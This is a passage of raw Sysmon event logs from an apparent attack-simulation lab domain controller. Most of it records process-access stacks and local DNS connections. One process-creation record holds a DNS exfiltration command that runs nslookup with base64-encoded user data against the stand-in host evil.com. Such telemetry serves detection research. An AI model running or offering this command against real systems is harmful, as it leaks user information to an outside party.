LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1047-000000005F02}7768C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-1905-629A-0E47-000000005F02}78047316C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-1047-000000005F02}7768C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.451{2E1864BB-1905-629A-1047-000000005F02}7768C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-0E47-000000005F02}7804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlexs.tmp 2>&1 354300x8000000000000000217529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.030{00000000-0000-0000-0000-000000000000}7300<unknown process>-udpfalsefalse127.0.0.1-51485-false127.0.0.1-53domain 354300x8000000000000000217528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.030{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51485- 354300x8000000000000000217527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.030{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51485- 354300x8000000000000000217526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.030{00000000-0000-0000-0000-000000000000}7300<unknown process>-udptruefalse127.0.0.1-51485-false127.0.0.1-53domain 354300x8000000000000000217525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{00000000-0000-0000-0000-000000000000}7300<unknown process>-udpfalsefalse127.0.0.1-51484-false127.0.0.1-53domain 354300x8000000000000000217524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51484- 354300x8000000000000000217523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51484- 354300x8000000000000000217522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{00000000-0000-0000-0000-000000000000}7300<unknown process>-udpfalsefalse127.0.0.1-51483-false127.0.0.1-53domain 354300x8000000000000000217521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51483- 354300x8000000000000000217520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51483- 354300x8000000000000000217519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.938{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51482- 354300x8000000000000000217518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.938{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51482- 354300x8000000000000000217517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.856{00000000-0000-0000-0000-000000000000}5824<unknown process>-udpfalsefalse127.0.0.1-51481-false127.0.0.1-53domain 354300x8000000000000000217516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51481- 354300x8000000000000000217515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51481- 354300x8000000000000000217514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.856{00000000-0000-0000-0000-000000000000}5824<unknown process>-udptruefalse127.0.0.1-51481-false127.0.0.1-53domain 354300x8000000000000000217513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.855{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51480- 354300x8000000000000000217512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.855{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51480- 354300x8000000000000000217511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.854{00000000-0000-0000-0000-000000000000}5824<unknown process>-udpfalsefalse127.0.0.1-51479-false127.0.0.1-53domain 354300x8000000000000000217510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.854{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51479- 354300x8000000000000000217509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.853{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51479- 354300x8000000000000000217508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.853{00000000-0000-0000-0000-000000000000}5824<unknown process>-udptruefalse127.0.0.1-51479-false127.0.0.1-53domain 354300x8000000000000000217507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51478- 354300x8000000000000000217506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51478- 354300x8000000000000000217505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51477- 354300x8000000000000000217504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51477- 354300x8000000000000000217503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51476- 354300x8000000000000000217502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.765{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51476- 354300x8000000000000000217501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{00000000-0000-0000-0000-000000000000}3536<unknown process>-udpfalsefalse127.0.0.1-51475-false127.0.0.1-53domain 354300x8000000000000000217500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51475- 354300x8000000000000000217499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51475- 354300x8000000000000000217498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{00000000-0000-0000-0000-000000000000}3536<unknown process>-udptruefalse127.0.0.1-51475-false127.0.0.1-53domain 354300x8000000000000000217497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{00000000-0000-0000-0000-000000000000}3536<unknown process>-udpfalsefalse127.0.0.1-51474-false127.0.0.1-53domain 354300x8000000000000000217496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51474- 354300x8000000000000000217495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51474- 354300x8000000000000000217494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.696{00000000-0000-0000-0000-000000000000}3536<unknown process>-udptruefalse127.0.0.1-51474-false127.0.0.1-53domain 354300x8000000000000000217493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51473- 354300x8000000000000000217492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51473- 354300x8000000000000000217491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.695{00000000-0000-0000-0000-000000000000}3536<unknown process>-udptruefalse127.0.0.1-51473-false127.0.0.1-53domain 354300x8000000000000000217490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51472- 354300x8000000000000000217489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51472- 354300x8000000000000000217488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51471- 354300x8000000000000000217487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51471- 354300x8000000000000000217486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51470- 354300x8000000000000000217485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51470- 354300x8000000000000000217484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{00000000-0000-0000-0000-000000000000}928<unknown process>-udpfalsefalse127.0.0.1-51469-false127.0.0.1-53domain 354300x8000000000000000217483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51469- 354300x8000000000000000217482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51469- 354300x8000000000000000217481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{00000000-0000-0000-0000-000000000000}928<unknown process>-udptruefalse127.0.0.1-51469-false127.0.0.1-53domain 354300x8000000000000000217480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{00000000-0000-0000-0000-000000000000}928<unknown process>-udpfalsefalse127.0.0.1-51468-false127.0.0.1-53domain 354300x8000000000000000217479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51468- 354300x8000000000000000217478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51468- 354300x8000000000000000217477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.537{00000000-0000-0000-0000-000000000000}928<unknown process>-udptruefalse127.0.0.1-51468-false127.0.0.1-53domain 354300x8000000000000000217476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.537{00000000-0000-0000-0000-000000000000}928<unknown process>-udpfalsefalse127.0.0.1-51467-false127.0.0.1-53domain 354300x8000000000000000217475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51467- 354300x8000000000000000217474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51467- 354300x8000000000000000217473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.537{00000000-0000-0000-0000-000000000000}928<unknown process>-udptruefalse127.0.0.1-51467-false127.0.0.1-53domain 354300x8000000000000000217472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.465{00000000-0000-0000-0000-000000000000}3916<unknown process>-udpfalsefalse127.0.0.1-51466-false127.0.0.1-53domain 354300x8000000000000000217471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.465{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51466- 354300x8000000000000000217470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.465{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51466- 354300x8000000000000000217469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.465{00000000-0000-0000-0000-000000000000}3916<unknown process>-udptruefalse127.0.0.1-51466-false127.0.0.1-53domain 354300x8000000000000000217468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51465- 354300x8000000000000000217467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51465- 354300x8000000000000000217466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{00000000-0000-0000-0000-000000000000}7384<unknown process>-udptruefalse127.0.0.1-51465-false127.0.0.1-53domain 354300x8000000000000000217465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{00000000-0000-0000-0000-000000000000}7384<unknown process>-udpfalsefalse127.0.0.1-51464-false127.0.0.1-53domain 354300x8000000000000000217464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51464- 354300x8000000000000000217463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51464- 354300x8000000000000000217462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{00000000-0000-0000-0000-000000000000}7384<unknown process>-udptruefalse127.0.0.1-51464-false127.0.0.1-53domain 354300x8000000000000000217461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51463- 354300x8000000000000000217460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51463- 354300x8000000000000000217459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{00000000-0000-0000-0000-000000000000}7384<unknown process>-udptruefalse127.0.0.1-51463-false127.0.0.1-53domain 354300x8000000000000000217458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{00000000-0000-0000-0000-000000000000}5628<unknown process>-udpfalsefalse127.0.0.1-51462-false127.0.0.1-53domain 354300x8000000000000000217457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51462- 354300x8000000000000000217456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51462- 354300x8000000000000000217455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{00000000-0000-0000-0000-000000000000}5628<unknown process>-udptruefalse127.0.0.1-51462-false127.0.0.1-53domain 354300x8000000000000000217454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{00000000-0000-0000-0000-000000000000}5628<unknown process>-udpfalsefalse127.0.0.1-51461-false127.0.0.1-53domain 354300x8000000000000000217453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51461- 354300x8000000000000000217452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51461- 354300x8000000000000000217451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.233{00000000-0000-0000-0000-000000000000}5628<unknown process>-udpfalsefalse127.0.0.1-51460-false127.0.0.1-53domain 354300x8000000000000000217450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.233{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51460- 354300x8000000000000000217449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.233{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT 